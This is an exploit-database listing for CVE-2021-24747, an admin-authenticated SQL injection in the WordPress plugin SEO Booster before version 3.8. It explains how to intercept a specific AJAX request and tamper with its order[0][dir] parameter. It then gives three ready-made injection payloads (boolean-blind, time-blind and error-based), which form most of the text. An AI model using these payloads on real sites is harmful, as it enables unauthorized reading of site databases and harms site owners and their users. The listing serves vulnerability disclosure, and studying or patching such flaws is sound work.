Exploit for SEO Booster < 3.8 - Admin+ SQL Injection CVE-2021-24747

Name: Exploit for SEO Booster < 3.8 - Admin+ SQL Injection CVE-2021-24747
Rating: 5 (90 reviews)

2021-11-15 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:40849D93-8949-4BD0-B60E-C0330B385FEA
Install SEO Booster, then click on the "Incoming Keywords" link in the Wordpress administrative interface. An ajax request called "fn_my_ajaxified_dataloader_ajax" will be generated and sent. Intercept it and modify order[0][dir] parameter to achieve different types of SQL injections.

Sqlmap vectors:

1. Type: boolean-based blind
order[0][dir]=desc,(SELECT (CASE WHEN (1081=1081) THEN 1 ELSE 1081*(SELECT 1081 FROM INFORMATION_SCHEMA.PLUGINS) END))

2. Type: time-based blind
order[0][dir]=desc PROCEDURE ANALYSE(EXTRACTVALUE(8553,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x4b686547))))),1)#

3. Type: error-based
order[0][dir]=desc,(SELECT 9426 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(9426=9426,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)